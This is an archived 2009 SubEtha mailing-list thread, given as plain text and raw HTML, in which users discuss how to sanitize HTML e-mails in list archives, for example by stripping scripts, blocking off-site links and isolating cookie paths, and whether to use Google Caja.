SubEtha Users <users@subethamail.org>
From Jon Stevens Jun 15, 2009 5:27 PM
After doing a bit of research, the best approach is probably to figure out how to integrate Caja. http://code.google.com/p/google-caja/wiki/CajaCajole jon My blog: http://lookfirst.com/ On Mon, Jun 15, 2009 at 5:02 PM, shop <shop@pmcs-inc.com> wrote: > My definition of sanitized is fairly straight forward: > > - No scripts > > - No scripts in links (somewhat redundant, I know) > > - No links that point directly off-site > > - No embeds that point directly off-site (displaying attached > images is fine) > > > > This would, of course, break quite a few HTML e-mails, but should be > reasonable. > > > > A little simple encoding with a seed generated randomly per page view for > links and off-site embeds which could be reversible in the browser with > JavaScript if a user agrees should handle that problem. This would give you > an Outlook- and Thunderbird-like “Enable links and embedded images in this > message” button. > > > > Using a separate root subdirectory (subethamail.org/disp/* instead of > subethamail.org/se/*) for display of HTML e-mails would let you restrict > cookies to the /se/* path and reduce the chance of cookie stealing. > > > > > > *From:* users@subethamail.org [mailto:users@subethamail.org] *On Behalf Of > *Jon Stevens > *Sent:* Monday, June 15, 2009 4:50 PM > > *To:* users@subethamail.org > *Subject:* Re: HTML e-mail support > > > > I'm not disagreeing with you about the quality of the display of our > archives. It could definitely use some improvement. > > > > It would be pretty easy to modify the template to not show anything other > than the text/plain portion, but then what happens when there isn't a > text/plain portion? You would get a blank page. A link to a sanitized* HTML > version is also just as hard to securely display in a linked page as it > would be in the actual page. > > > > * define 'sanitized'. No embedded content? Nothing that can steal your > cookies? > > > > So, if you come up with a workable solution that makes you happy, let me > know. Unfortunately, we are dealing with a pretty complicated problem here. > > > > jon > > > My blog: http://lookfirst.com/ > > On Mon, Jun 15, 2009 at 3:42 PM, shop <shop@pmcs-inc.com> wrote: > > Pretty would be nice… > > > > Ideally I’d like to see the plain text version, or a properly sanitized > version if it’s not multipart in the archives. A link to a sanitized HTML > version would be nice, as embedding it directly or displaying as-is is a > fairly bad idea from a security and privacy perspective. > > > > -Chris > > > > *From:* users@subethamail.org [mailto:users@subethamail.org] *On Behalf Of > *Jon Stevens > *Sent:* Monday, June 15, 2009 3:36 PM > > > *To:* users@subethamail.org > *Subject:* Re: HTML e-mail support > > > > Well, that is up for interpretation. =) How would you like it to appear in > the archives? > > > > jon > > > My blog: http://lookfirst.com/ > > On Mon, Jun 15, 2009 at 3:26 PM, shop <shop@pmcs-inc.com> wrote: > > Though not in the archive… > > > > *From:* users@subethamail.org [mailto:users@subethamail.org] *On Behalf Of > *Jon Stevens > *Sent:* Monday, June 15, 2009 2:57 PM > *To:* users@subethamail.org > *Subject:* Re: HTML e-mail support > > > > Clearly handles it just fine. > > > > jon > > > > On Mon, Jun 15, 2009 at 2:49 PM, shop <shop@pmcs-inc.com> wrote: > > Looking at the documentation <http://code.google.com/p/subetha/w/list> and > mailing list archives <http://www.subethamail.org/se/archive.jsp?listId=4>, > it is not clear how well SubEtha handles HTML e-mails such as *this one*. > > > > Would you enlighten me please? I’m hoping to deploy SubEtha, well, > tomorrow. > > > > [image: sewious.jpg] > > > > > > >
After doing a bit of research, the best approach is probably to figure out how to integrate Caja.<div><br></div><div><a href="http://code.google.com/p/google-caja/wiki/CajaCajole">http://code.google.com/p/google-caja/wiki/CajaCajole</a></div> <div><br></div><div>jon</div><div><br clear="all">My blog: <a href="http://lookfirst.com/">http://lookfirst.com/</a><br> <br><br><div class="gmail_quote">On Mon, Jun 15, 2009 at 5:02 PM, shop <span dir="ltr"><<a href="mailto:shop@pmcs-inc.com">shop@pmcs-inc.com</a>></span> wrote:<br><blockquote class="gmail_quote" style="margin:0 0 0 .8ex;border-left:1px #ccc solid;padding-left:1ex;"> <div lang="EN-US" link="blue" vlink="purple"> <div> <p><span style="font-size:11.0pt;color:#1F497D">My definition of sanitized is fairly straight forward:</span></p> <p style="margin-left:.75in;text-indent:-.25in"><span style="font-size:11.0pt;color:#1F497D"><span>-<span style="font:7.0pt "Times New Roman""> </span></span></span><span style="font-size:11.0pt;color:#1F497D">No scripts </span></p> <p style="margin-left:.75in;text-indent:-.25in"><span style="font-size:11.0pt;color:#1F497D"><span>-<span style="font:7.0pt "Times New Roman""> </span></span></span><span style="font-size:11.0pt;color:#1F497D">No scripts in links (somewhat redundant, I know)</span></p> <p style="margin-left:.75in;text-indent:-.25in"><span style="font-size:11.0pt;color:#1F497D"><span>-<span style="font:7.0pt "Times New Roman""> </span></span></span><span style="font-size:11.0pt;color:#1F497D">No links that point directly off-site</span></p> <p style="margin-left:.75in;text-indent:-.25in"><span style="font-size:11.0pt;color:#1F497D"><span>-<span style="font:7.0pt "Times New Roman""> </span></span></span><span style="font-size:11.0pt;color:#1F497D">No embeds that point directly off-site (displaying attached images is fine)</span></p> <p><span style="font-size:11.0pt;color:#1F497D"> </span></p> <p><span style="font-size:11.0pt;color:#1F497D">This would, of course, break quite a few HTML e-mails, but should be reasonable.</span></p> <p><span style="font-size:11.0pt;color:#1F497D"> </span></p> <p><span style="font-size:11.0pt;color:#1F497D"> A little simple encoding with a seed generated randomly per page view for links and off-site embeds which could be reversible in the browser with JavaScript if a user agrees should handle that problem. This would give you an Outlook- and Thunderbird-like “Enable links and embedded images in this message” button.</span></p> <p><span style="font-size:11.0pt;color:#1F497D"> </span></p> <p><span style="font-size:11.0pt;color:#1F497D">Using a separate root subdirectory (<a href="http://subethamail.org/disp/*" target="_blank">subethamail.org/disp/*</a> instead of <a href="http://subethamail.org/se/*" target="_blank">subethamail.org/se/*</a>) for display of HTML e-mails would let you restrict cookies to the /se/* path and reduce the chance of cookie stealing.</span></p> <p><span style="font-size:11.0pt;color:#1F497D"> </span></p> <p><span style="font-size:11.0pt;color:#1F497D"> </span></p> <div style="border:none;border-top:solid #B5C4DF 1.0pt;padding:3.0pt 0in 0in 0in"> <p><b><span style="font-size:10.0pt">From:</span></b><span style="font-size:10.0pt"> <a href="mailto:users@subethamail.org" target="_blank">users@subethamail.org</a> [mailto:<a href="mailto:users@subethamail.org" target="_blank">users@subethamail.org</a>] <b>On Behalf Of </b>Jon Stevens<br> <b>Sent:</b> Monday, June 15, 2009 4:50 PM</span></p><div><div></div><div class="h5"><br> <b>To:</b> <a href="mailto:users@subethamail.org" target="_blank">users@subethamail.org</a><br> <b>Subject:</b> Re: HTML e-mail support</div></div><p></p> </div><div><div></div><div class="h5"> <p> </p> <div> <p>I'm not disagreeing with you about the quality of the display of our archives. It could definitely use some improvement.</p> </div> <div> <p> </p> </div> <p>It would be pretty easy to modify the template to not show anything other than the text/plain portion, but then what happens when there isn't a text/plain portion? You would get a blank page. A link to a sanitized* HTML version is also just as hard to securely display in a linked page as it would be in the actual page.</p> <div> <p> </p> </div> <div> <p>* define 'sanitized'. No embedded content? Nothing that can steal your cookies?</p> <div> <p> </p> </div> <div> <p>So, if you come up with a workable solution that makes you happy, let me know. Unfortunately, we are dealing with a pretty complicated problem here.</p> </div> <div> <p> </p> </div> <div> <p>jon</p> </div> <div> <p style="margin-bottom:12.0pt"><br clear="all"> My blog: <a href="http://lookfirst.com/" target="_blank">http://lookfirst.com/</a><br> <br> </p> <div> <p>On Mon, Jun 15, 2009 at 3:42 PM, shop <<a href="mailto:shop@pmcs-inc.com" target="_blank">shop@pmcs-inc.com</a>> wrote:</p> <div> <div> <p><span style="font-size:11.0pt;color:#1F497D">Pretty would be nice…</span></p> <p><span style="font-size:11.0pt;color:#1F497D"> </span></p> <p><span style="font-size:11.0pt;color:#1F497D">Ideally I’d like to see the plain text version, or a properly sanitized version if it’s not multipart in the archives. A link to a sanitized HTML version would be nice, as embedding it directly or displaying as-is is a fairly bad idea from a security and privacy perspective.</span></p> <p><span style="font-size:11.0pt;color:#1F497D"> </span></p> <p><span style="font-size:11.0pt;color:#1F497D">-Chris</span></p> <p><span style="font-size:11.0pt;color:#1F497D"> </span></p> <div style="border:none;border-top:solid #B5C4DF 1.0pt;padding:3.0pt 0in 0in 0in"> <p><b><span style="font-size:10.0pt">From:</span></b><span style="font-size:10.0pt"> <a href="mailto:users@subethamail.org" target="_blank">users@subethamail.org</a> [mailto:<a href="mailto:users@subethamail.org" target="_blank">users@subethamail.org</a>] <b>On Behalf Of </b>Jon Stevens<br> <b>Sent:</b> Monday, June 15, 2009 3:36 PM</span></p> <div> <p><br> <b>To:</b> <a href="mailto:users@subethamail.org" target="_blank">users@subethamail.org</a><br> <b>Subject:</b> Re: HTML e-mail support</p> </div> </div> <div> <p> </p> <p>Well, that is up for interpretation. =) How would you like it to appear in the archives?</p> <div> <p> </p> </div> <div> <p>jon</p> </div> <div> <p style="margin-bottom:12.0pt"><br clear="all"> My blog: <a href="http://lookfirst.com/" target="_blank">http://lookfirst.com/</a></p> <div> <p>On Mon, Jun 15, 2009 at 3:26 PM, shop <<a href="mailto:shop@pmcs-inc.com" target="_blank">shop@pmcs-inc.com</a>> wrote:</p> <div> <div> <p><span style="font-size:11.0pt;color:#1F497D">Though not in the archive…</span></p> <p><span style="font-size:11.0pt;color:#1F497D"> </span></p> <div style="border:none;border-top:solid #B5C4DF 1.0pt;padding:3.0pt 0in 0in 0in"> <p><b><span style="font-size:10.0pt">From:</span></b><span style="font-size:10.0pt"> <a href="mailto:users@subethamail.org" target="_blank">users@subethamail.org</a> [mailto:<a href="mailto:users@subethamail.org" target="_blank">users@subethamail.org</a>] <b>On Behalf Of </b>Jon Stevens<br> <b>Sent:</b> Monday, June 15, 2009 2:57 PM<br> <b>To:</b> <a href="mailto:users@subethamail.org" target="_blank">users@subethamail.org</a><br> <b>Subject:</b> Re: HTML e-mail support</span></p> </div> <div> <div> <p> </p> <p>Clearly handles it just fine.</p> <div> <p> </p> </div> <div> <p>jon</p> </div> <div> <p style="margin-bottom:12.0pt"> </p> <div> <p>On Mon, Jun 15, 2009 at 2:49 PM, shop <<a href="mailto:shop@pmcs-inc.com" target="_blank">shop@pmcs-inc.com</a>> wrote:</p> <div> <div> <p>Looking at the <a href="http://code.google.com/p/subetha/w/list" target="_blank">documentation</a> and <a href="http://www.subethamail.org/se/archive.jsp?listId=4" target="_blank">mailing list archives</a>, it is not clear how well SubEtha handles HTML e-mails such as <i>this one</i>.</p> <p> </p> <p>Would you enlighten me please? I’m hoping to deploy SubEtha, well, tomorrow.</p> <p> </p> <p><img border="0" width="247" height="251" src="cid:image001.jpg@01C9EDDA.09697750" alt="sewious.jpg"></p> </div> </div> </div> <p> </p> </div> </div> </div> </div> </div> </div> <p> </p> </div> </div> </div> </div> </div> <p> </p> </div> </div> </div></div></div> </div> </blockquote></div><br></div>
